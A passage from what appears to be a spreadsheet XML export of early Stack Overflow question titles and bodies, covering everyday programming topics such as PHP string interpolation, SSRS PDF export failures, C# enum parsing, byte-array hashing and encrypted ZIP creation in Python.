&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    $foo = 'some words';
    //case 1
    print "these are $foo";
    //case 2
    print "these are {$foo}";
    //case 3
    print 'these are ' . $foo;
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there much of a difference between 1 and 2?&lt;/p&gt;
&lt;p&gt;If not, what about between 1/2 and 3?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Developer testing vs. QA team testing - What is the right division of work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While trying to advocate more developer testing, I find the argument "Isn't that QA's job?" is used a lot.  In my mind, it doesn't make sense to give the QA team all testing responsibilities, but at the same time Spolsky and others say you shouldn't be using the $100/hr developers to do something a $30/hr tester could be doing.  What are the experiences of others in a company with a dedicated QA team?  Where should the division of work be drawn?&lt;/p&gt;
&lt;p&gt;Clarification: I meant QA as a validation and verification team. Devs should not be doing the validation (customer-focused testing), but where is the verification (functional testing) division point?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make Powershell run a batch file and then stay open?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example; with the old command prompt it would be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cmd.exe /k mybatchfile.bat
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Using OpenGL textures larger than window/display size</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having problems using textures that are larger than the OpenGL window or the display size as non-display render targets.&lt;br&gt;
What's the solution for this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RGB to monochrome conversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I convert the RGB values of a pixel to a single monochrome value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I call a Flex SWF from a remote domain using Flash (AS3)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Flex swf hosted at &lt;a href="http://www.a.com/a.swf" rel="nofollow"&gt;http://www.a.com/a.swf&lt;/a&gt;.
I have a flash code on another doamin that tries loading the SWF:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_loader = new Loader();
var req:URLRequest = new URLRequest("http://services.nuconomy.com/n.swf");
_loader.contentLoaderInfo.addEventListener(Event.COMPLETE,onLoaderFinish);
_loader.load(req);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the onLoaderFinish event I try to load classes from the remote SWF and create them:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_loader.contentLoaderInfo.applicationDomain.getDefinition("someClassName") as Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When this code runs I get the following exception&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SecurityError: Error #2119: Security sandbox violation: caller http://localhost.service:1234/flashTest/Main.swf cannot access LoaderInfo.applicationDomain owned by http://www.b.com/b.swf.
    at flash.display::LoaderInfo/get applicationDomain()
    at NuconomyLoader/onLoaderFinish()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any way to get this code working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GLUT pop-up menus</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it easy to create GLUT pop-up menus for my OpenGL application? If yes, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are there so few modal-editors that aren't vi*?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Pretty much every other editor that isn't a vi descendant (vim, cream, vi-emu) seems to use the emacs shortcuts (&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;w&lt;/kbd&gt; to delete back a word and so on)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ-to-SQL vs stored procedures?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I took a look at the "Beginner's Guide to LINQ" post here on StackOverflow (&lt;a href="http://stackoverflow.com/questions/8050/beginners-guide-to-linq"&gt;http://stackoverflow.com/questions/8050/beginners-guide-to-linq&lt;/a&gt;), but had a follow-up question:&lt;/p&gt;
&lt;p&gt;We're about to ramp up a new project where nearly all of our database op's will be fairly simple data retrievals (there's another segment of the project which already writes the data). Most of our other projects up to this point make use of stored procedures for such things. However, I'd like to leverage LINQ-to-SQL if it makes more sense.&lt;/p&gt;
&lt;p&gt;So, the question is this: For simple data retrievals, which approach is better, LINQ-to-SQL or stored procs? Any specific pro's or con's?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to organize dataset queries to improve performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't know when to add to a dataset a tableadapter or a query from toolbox. Does it make any difference?&lt;/p&gt;
&lt;p&gt;I also dont know where to create instances of the adapters. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Should I do it in the &lt;code&gt;Page_Load&lt;/code&gt;? &lt;/li&gt;
&lt;li&gt;Should I just do it when I'm going to use it?  &lt;/li&gt;
&lt;li&gt;Am I opening a new connection when I create a new instance?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This doesn't seem very important, but every time I create a query a little voice on my brain asks me these questions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to disable command input in the toolbar search box?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the Visual Studio toolbar, you can enter commands into the search box by prefixing them with a &gt; symbol. Is there any way to disable this? I've never used the feature, and it's slightly annoying when trying to actually search for something that you know is prefixed by greater-than in the code. It's particularly annoying when you accidentally search for "&gt; exit" and the IDE quits (I knew there was a line in the code that was something like &lt;code&gt;if(counter &amp;gt; exitCount)&lt;/code&gt; so entered that search without thinking).&lt;/p&gt;
&lt;p&gt;At the very least, can you escape the &gt; symbol so that you can search for it? Prefixing with ^ doesn't seem to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How best to use File Version and Assembly Version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET there are two version numbers available when building a project, File Version and Assembly Version. How are you using these numbers?  Keeping them the same?  Auto-incrementing one, but manually changing the other?&lt;/p&gt;
&lt;p&gt;Also what about the &lt;code&gt;AssemblyInformationalVersion&lt;/code&gt; attribute?&lt;/p&gt;
&lt;p&gt;I'd found this support Microsoft Knowledge Base (KB) article that provided some help:  &lt;a href="http://support.microsoft.com/kb/556041"&gt;How to use Assembly Version and Assembly File Version&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you set your LAMP testing server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using xampp on Windows, but I would like to use something closer to my server setup.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://phpimpact.wordpress.com/2008/05/24/virtual-appliances-lamp-development-made-easy/" rel="nofollow"&gt;Federico Cargnelutti tutorial&lt;/a&gt; explains how to setup LAMP VMWARE appliance; it is a great introduction to VMware appliances, but one of the commands was not working and it doesn't describe how to change the keyboard layout and the timezone.&lt;/p&gt;
&lt;p&gt;ps: the commands are easy to find but I don't want to look for them each time I reinstall the server. I am using this question as a reminder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing CURRENT save/default directory in Delphi 2007 without using Save-As</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project group that contains a project I'm working on as well as some related component and packages. I prefer to keep the database links active during design-time. &lt;/p&gt;
&lt;p&gt;I know how to write the code which would change the database file location, but in this case, I'm just using &lt;code&gt;".\data"&lt;/code&gt; instead, for various design-time reasons. Unfortunately, using a relative folder means that Delphi needs to be "pointing" to the same folder that the project is in.&lt;/p&gt;
&lt;p&gt;I'd like to be able to force the folder location to a different root, without using the "Save As" feature. Does anyone happen to know where the Delphi IDE retrieves that info?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you create a debug only function that takes a variable argument list? Like printf()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to make a debug logging function with the same parameters as &lt;code&gt;printf&lt;/code&gt;.  But one that can be removed by the pre-processor during optimized builds.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Debug_Print("Warning: value %d &amp;gt; 3!\n", value);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've looked at variadic macros but those aren't available on all platforms. &lt;code&gt;gcc&lt;/code&gt; supports them, &lt;code&gt;msvc&lt;/code&gt; does not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Optimizing the PDF Export of Huge Reports in Sql Reporting Services 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First off I understand that it is a horrible idea to run extremely large/long running reports. I am aware that Microsoft has a rule of thumb stating that a SSRS report should take no longer than 30 seconds to execute.  However sometimes gargantuan reports are a preferred evil due to external forces such complying with state laws.&lt;/p&gt;
&lt;p&gt;At my place of employment, we have an asp.net (2.0) app that we have migrated from Crystal Reports to SSRS. Due to the large user base and complex reporting UI requirements we have a set of screens that accepts user inputted parameters and creates schedules to be run over night. Since the application supports multiple reporting frameworks we do not use the scheduling/snapshot facilities of SSRS. All of the reports in the system are generated by a scheduled console app which takes user entered parameters and generates the reports with the corresponding reporting solutions the reports were created with. In the case of SSRS reports, the console app generates the SSRS reports and exports them as PDFs via the SSRS web service API. &lt;/p&gt;
&lt;p&gt;So far SSRS has been much easier to deal with than Crystal with the exception of a certain 25,000 page report that we have recently converted from crystal reports to SSRS. The SSRS server is a 64bit 2003 server with 32 gigs of ram running SSRS 2005. All of our smaller reports work fantastically, but we are having trouble with our larger reports such as this one.  Unfortunately, we can't seem to generate the aforemention report through the web service API. The following error occurs roughly 30-35 minutes into the generation/export:&lt;/p&gt;
&lt;p&gt;Exception Message: The underlying connection was closed: An unexpected error occurred on a receive.&lt;/p&gt;
&lt;p&gt;The web service call is something I'm sure you all have seen before:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data = rs.Render(this.ReportPath, this.ExportFormat, null, deviceInfo,
   selectedParameters, null, null, out encoding, out mimeType, out usedParameters, 
   out warnings, out streamIds);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The odd thing is that this report will run/render/export if the report is run directly on the reporting server using the report manager. The proc that produces the data for the report runs for about 5 minutes. The report renders in SSRS native format in the browser/viewer after about 12 minutes. Exporting to pdf through the browser/viewer in the report manager takes an additional 55 minutes. This works reliably and it produces a whopping 1.03gb pdf.&lt;/p&gt;
&lt;p&gt;Here are some of the more obvious things I've tried to get the report working via the web service API:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;set the HttpRuntime ExecutionTimeout
value to 3 hours on the report
server&lt;/li&gt;
&lt;li&gt;disabled http keep alives on the report server&lt;/li&gt;
&lt;li&gt;increased the script timeout on the report server&lt;/li&gt;
&lt;li&gt;set the report to never time out on the server&lt;/li&gt;
&lt;li&gt;set the report timeout to several hours on the client call  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;From the tweaks I have tried, I am fairly comfortable saying that any timeout issues have been eliminated. &lt;/p&gt;
&lt;p&gt;Based off of my research of the error message, I believe that the web service API does not send chunked responses by default. This means that it tries to send all 1.3gb over the wire in one response. At a certain point, IIS throws in the towel. Unfortunately the API abstracts away web service configuration so I can't seem to find a way to enable response chunking. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Does anyone know of anyway to reduce/optimize the PDF export phase and or the size of the PDF without lowering the total page count?&lt;/li&gt;
&lt;li&gt;Is there a way to turn on response chunking for SSRS?&lt;/li&gt;
&lt;li&gt;Does anyone else have any other theories as to why this runs on the server but not through the API?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;EDIT: After reading kcrumley's post I began to take a look at the average page size by taking file size / page count. Interestingly enough on smaller reports the math works out so that each page is roughly 5K. Interestingly, when the report gets larger this "average" increases. An 8000 page report for example is averaging over 40K/page. Very odd. I will also add that the number of records per page is set except for the last page in each grouping, so it's not a case where some pages have more records than another. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices for managing and deploying large JavaScript apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some standard practices for managing a medium-large JavaScript application? My concerns are both speed for browser download and ease and maintainability of development.&lt;/p&gt;
&lt;p&gt;Our JavaScript code is roughly "namespaced" as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var Client = {
   var1: '',
   var2: '',
   accounts: {
      /* 100's of functions and variables */
   },
   orders: {
      /* 100's of functions and variables and subsections */
   }
   /* etc, etc  for a couple hundred kb */
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At the moment, we have one (unpacked, unstripped, highly readable) JavaScript file to handle all the business logic on the web application. In addition, there is jQuery and several jQuery extensions. The problem we face is that it takes &lt;em&gt;forever&lt;/em&gt; to find anything in the JavaScript code and the browser still has a dozen files to download.&lt;/p&gt;
&lt;p&gt;Is it common to have a handful of "source" JavaScript files that gets "compiled" into one final, compressed JavaScript file? Any other handy hints or best practices?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get rid of Home in ASP.Net MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this site is written using ASP.Net MVC and I do not see "/Home" in the url.  This proves to me that it can be done.  What special route and do I need?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you begin designing a large system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's been mentioned to me that I'll be the sole developer behind a large new system.  Among other things I'll be designing a UI and database schema.&lt;/p&gt;
&lt;p&gt;I'm sure I'll receive some guidance, but I'd like to be able to knock their socks off.  What can I do in the meantime to prepare, and what will I need to keep in mind when I sit down at my computer with the spec?&lt;/p&gt;
&lt;p&gt;A few things to keep in mind: I'm a college student at my first real programming job.  I'll be using Java.  We already have SCM set up with automated testing, etc...so tools are not an issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Runtime Configuration in .Net (specifically the EntLib)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to configure a DB connection at runtime; specifically using the Enterprise Library.  I see that there's a *.Data.Configuration (or something close to this ... don't recall off the top of my head) assembly but am finding not much on the interwebs.  Complicating matters is the fact that the API help is broken on Vista.&lt;/p&gt;
&lt;p&gt;Now, I found this work-around:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Configuration cfg = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
ConnectionStringSettings connection = new ConnectionStringSettings();
connection.Name = "Runtime Connection";
connection.ProviderName = "System.Data.OleDb";
connection.ConnectionString = "myconstring";
cfg.ConnectionStrings.ConnectionStrings.Add(connection);
cfg.Save(ConfigurationSaveMode.Modified);
ConfigurationManager.RefreshSection("connectionStrings");
var runtimeCon = DatabaseFactory.CreateDatabase("Runtime Connection");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And although it gives me what I want, it permanently edits the App.config. Sure I can go back and delete the changes, but I'd rather not go through this hassle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read from .msg files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to read from Outlook .MSG file in .NET &lt;em&gt;without&lt;/em&gt; using COM API for Outlook (cos it will not be installed on the machines that my app will run). Are there any free 3rd party libraries to do that? I want to extract From, To, CC and BCC fields. Sent/Receive date fields would be good if they are also stored in MSG files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity diagrams in ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way/tool to display nice diagrams with entity relationships in ASP MVC views?  &lt;br /&gt;
i.e. servers and and applications, or servers with other servers.&lt;/p&gt;
&lt;p&gt;Are there any third party tools out there that can do this?  &lt;br /&gt;
I've been searching around things like Telerik, but it's really hard to google for this!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert a string to an enum in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to convert a string to an enumeration value in C#?&lt;/p&gt;
&lt;p&gt;I have an HTML select tag containing the values of an enumeration. When the page is posted, I want to pick up the value (which will be in the form of a string) and convert it to the enumeration value.&lt;/p&gt;
&lt;p&gt;In an ideal world, I could do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = StatusEnum.Parse("Active");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that isn't valid code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Auto Clearing Winform Textbox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a user that want to be able to select a textbox and have the current text selected so that he doesn't have to highlight it all in order to change the contents.  &lt;/p&gt;
&lt;p&gt;The contents need to be handle when enter is pushed.  That part I think I have figured out but any suggestions would be welcome. &lt;/p&gt;
&lt;p&gt;The part I need help with is that once enter has been pushed, any entry into the textbox should clear the contents again.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The textbox controls an piece of RF hardware.  What the user wants to be able to do is enter a setting and press enter.  The setting is sent to the hardware.  Without doing anything else the user wants to be able to type in a new setting and press enter again.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to get started with OSGI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What makes a module/service/bit of application functionality a particularly good candidate for an OSGi module? &lt;/p&gt;
&lt;p&gt;I'm interested in using &lt;a href="http://en.wikipedia.org/wiki/OSGi"&gt;OSGi&lt;/a&gt; in my applications. We're a Java shop and we use Spring pretty extensively, so I'm leaning toward using &lt;a href="http://www.springframework.org/osgi"&gt;Spring Dynamic Modules for OSGi(tm) Service Platforms&lt;/a&gt;. I'm looking for a good way to incorporate a little bit of OSGi into an application as a trial. Has anyone here used this or a similar OSGi technology? Are there any pitfalls? &lt;/p&gt;
&lt;p&gt;@Nicolas - Thanks, I've seen that one. It's a good tutorial, but I'm looking more for ideas on how to do my first "real" OSGi bundle, as opposed to a Hello World example.&lt;/p&gt;
&lt;p&gt;@david - Thanks for the link! Ideally, with a greenfield app, I'd design the whole thing to be dynamic. What I'm looking for right now, though, is to introduce it in a small piece of an existing application. Assuming I can pick any piece of the app, what are some factors to consider that would make that piece better or worse as an OSGi guinea pig?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should DB layer members be static or instance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen projects where the classes in the DB layer have just static functions in them and other projects where those classes need to be instantiated to get access to the member functions. &lt;/p&gt;
&lt;p&gt;Which is "better" and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I handle page flow in MVC (particularly asp.net)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you had to provide a wizard like form entry experience in mvc how would you abstract the page flow?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I generate a hashcode from a byte array in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have an object that stores a byte array and I want to be able to efficiently generate a hashcode for it. I've used the cryptographic hash functions for this in the past because they are easy to implement, but they are doing a lot more work than they should to be cryptographically oneway, and I don't care about that (I'm just using the hashcode as a key into a hashtable).&lt;/p&gt;
&lt;p&gt;Here's what I have today:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct SomeData : IEquatable&amp;lt;SomeData&amp;gt;
{
    private readonly byte[] data;
    public SomeData(byte[] data)
    {
        if (null == data || data.Length &amp;lt;= 0)
        {
            throw new ArgumentException("data");
        }
        this.data = new byte[data.Length];
        Array.Copy(data, this.data, data.Length);
    }
    public override bool Equals(object obj)
    {
        return obj is SomeData &amp;amp;&amp;amp; Equals((SomeData)obj);
    }
    public bool Equals(SomeData other)
    {
        if (other.data.Length != data.Length)
        {
            return false;
        }
        for (int i = 0; i &amp;lt; data.Length; ++i)
        {
            if (data[i] != other.data[i])
            {
                return false;
            }
        }
        return true;
    }
    public override int GetHashCode()
    {
        return BitConverter.ToInt32(new MD5CryptoServiceProvider().ComputeHash(data), 0);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;dp: You are right that I missed a check in Equals, I have updated it.  Using the existing hashcode from the byte array will result in reference equality (or at least that same concept translated to hashcodes).
for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;byte[] b1 = new byte[] { 1 };
byte[] b2 = new byte[] { 1 };
int h1 = b1.GetHashCode();
int h2 = b2.GetHashCode();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With that code, despite the two byte arrays having the same values within them, they are referring to different parts of memory and will result in (probably) different hash codes. I need the hash codes for two byte arrays with the same contents to be equal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing N items from a list conditionally</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was writing some &lt;strong&gt;ASP.NET&lt;/strong&gt; control when I came to the scenario where I needed to remove items from a list, only when they matched a certain condition.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;RemoveAll&lt;/code&gt; method of the generic &lt;code&gt;List&lt;/code&gt; class does a good job, but removes &lt;em&gt;all&lt;/em&gt; items that match the condition, specified by the predicate.&lt;/p&gt;
&lt;p&gt;What if I want to only remove a certain number of items specifying the condition? What do you think is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best .NET build tool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/476163"&gt;NAnt or MSBuild, which one to choose and when?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What is the best build tool for &lt;a href="http://en.wikipedia.org/wiki/.NET_Framework"&gt;.NET&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I currently use &lt;a href="http://en.wikipedia.org/wiki/NAnt"&gt;NAnt&lt;/a&gt; but only because I have experience with &lt;a href="http://en.wikipedia.org/wiki/Apache_Ant"&gt;Ant&lt;/a&gt;. Is &lt;a href="http://en.wikipedia.org/wiki/MSBuild"&gt;MSBuild&lt;/a&gt; preferred?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you deal with transport-level errors in SqlConnection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every now and then in a high volume .NET application, you might see this exception when you try to execute a query:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.Data.SqlClient.SqlException:  A transport-level error has
  occurred when sending the request to the server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;According to my research, this is something that "just happens" and not much can be done to prevent it.  It does not happen as a result of a bad query, and generally cannot be duplicated.  It just crops up maybe once every few days in a busy OLTP system when the TCP connection to the database goes bad for some reason.&lt;/p&gt;
&lt;p&gt;I am forced to detect this error by parsing the exception message, and then retrying the entire operation from scratch, to include using a new connection.  None of that is pretty.&lt;/p&gt;
&lt;p&gt;Anybody have any alternate solutions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Internationalization in SSRS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to handle translations for stock text in a &lt;code&gt;SSRS&lt;/code&gt;. For instance - if I have a report that shows a grid of contents what's the best way to have the correct translation for the header of that grid show up, assuming the culture of the report is set correctly.&lt;/p&gt;
&lt;p&gt;Put another way - is it possible to do resources in a &lt;code&gt;SSRS&lt;/code&gt; report, or am I stuck with storing all that text in the database and querying for it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Haskell's algebraic data types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to fully understand all of Haskell's concepts.&lt;/p&gt;
&lt;p&gt;In what ways are algebraic data types similar to generic types, e.g., in C# and Java? And how are they different? What's so algebraic about them anyway? &lt;/p&gt;
&lt;p&gt;I'm familiar with universal algebra and its rings and fields, but I only have a vague idea of how Haskell's types work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting Started with Unit Testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;Unit testing is, roughly speaking, testing bits of your code in isolation with test code. The immediate advantages that come to mind are:&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;Running the tests becomes automate-able and repeatable&lt;/li&gt;
  &lt;li&gt;You can test at a much more granular level than point-and-click testing via a GUI&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/1383/what-is-unit-testing"&gt;Rytmis&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My question is, what are the current "best practices" in terms of tools as well as when and where to use unit testing as part of your daily coding?&lt;/p&gt;
&lt;p&gt;Lets try to be somewhat language agnostic and cover all the bases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS 2008 - Detachable code tabs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Admittedly this might not be a problem on larger screens, but my employer is abit tight and refuses to buy monitors larger than 19inch, this means that I dont have much screen real estate to view all the Visual Studio windows and my code at the same time, or two pieces of code at once. Is there anything that allows me to detach the code panels so that I can view two different classes at once on each of my screens? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommended notes/doc service that offers an API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a good online service for notes/documents (think Google Docs) that has a decent web UI and offers an API for clients to read/write the stored data.&lt;/p&gt;
&lt;p&gt;Google Docs is almost perfect - except there's no way to update the contents of existing documents.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to partition terabyte drive in a linux development machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a new 1 TB drive coming in tomorrow. What is the best way to divide this space for a development workstation?&lt;/p&gt;
&lt;p&gt;The biggest problem I think I'm going to have is that some partitions (probably /usr) will become to small after a bit of use. Other partitions are probably to huge. The swap drive for example is currently 2GB (2x 1GB RAM), but it is almost never used (only once that I know of).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you spawn another process in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you run an external program and pass it command line parameters using C? If you have to use operating system API, include a solution for Windows, Mac, and Linux.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to use IList and when to use List</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that IList is the interface and List is the concrete type but I still don't know when to use each one. What I'm doing now is if I don't need the Sort or FindAll methods I use the interface. Am I right? Is there a better way to decide when to use the interface or the concrete type?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create an encrypted ZIP file in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating an ZIP file with ZipFile in Python 2.5, it works ok so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import zipfile, os
locfile = "test.txt"
loczip = os.path.splitext (locfile)[0] + ".zip"
zip = zipfile.ZipFile (loczip, "w")
zip.write (locfile)
zip.close()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I couldn't find how to encrypt the files in the ZIP file.
I could use system and call PKZIP -s, but I suppose there must be a more "Pythonic" way.  I'm looking for an open source solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What areas of specialization within programming would you recommend to a beginner</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a student studying software development, and I feel programming, in general, is too broad of a subject to try to know everything. To be proficient, you have to decide which areas to focus your learning and understanding. Certain skill sets synergize with each other, like data-driven web development and SQL experience. However, all the win32 API experience in the world may not directly apply to linux development. This leads me to believe, as a beginning programmer, I should start deciding where I want to specialize after I have general understanding of the basic principles of software development. &lt;/p&gt;
&lt;p&gt;This is a multi-part question really: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What are the common specializations within computer programming and software development?  &lt;/li&gt;
&lt;li&gt;Which of these specializations have more long-term value, both as a foundation for other specializations and/or as marketable skills? &lt;/li&gt;
&lt;li&gt;Which skill sets complement each other? &lt;/li&gt;
&lt;li&gt;Are there any areas of specialization that hinder your ability of developing other areas of specialization.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Using GLEW to use OpenGL extensions under Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using OpenGL extensions on Windows the &lt;a href="http://stackoverflow.com/questions/14413/using-opengl-extensions-on-windows" rel="nofollow"&gt;painful way&lt;/a&gt;. Is GLEW the easier way to go? How do I get started with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Language Conversion Testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We created a tool which converts a language called P2, a language similar to assembly which I think exists only in Japan, to C#. There are at least a hundred modules written in P2 and we want to verify if the conversion to C# is right? How can we test this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are DispatcherObject.CheckAccess() and VerifyAccess() hidden from Intellisense?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;code&gt;System.Windows.Threading.DispatcherObject&lt;/code&gt; class (which &lt;code&gt;DependencyObject&lt;/code&gt; is based on) contains a useful function, called &lt;code&gt;CheckAccess()&lt;/code&gt;, that determines whether or not the code is running on the UI thread.&lt;/p&gt;
